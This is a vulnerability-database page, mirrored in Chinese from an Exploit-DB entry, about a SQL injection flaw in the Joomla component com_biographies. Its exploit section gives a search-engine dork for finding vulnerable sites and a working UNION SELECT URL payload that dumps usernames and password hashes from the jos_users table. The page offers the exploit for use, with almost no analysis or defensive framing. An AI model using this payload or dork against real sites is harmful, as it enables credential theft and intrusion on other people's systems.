Joomla! Component com_biographies - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059083 漏洞类型
发布时间 2010-01-22 更新时间 2010-01-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/11226
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#--------------------------------------------------------
#Joomla (com_biographies) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php      
#-------------------------------------------------------
#Dork:inurl"com_biographies"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_biographies&task=showFile&biobookid=-5+union+all+select+1,2,3,concat(username,0x3a,password)+from+jos_users--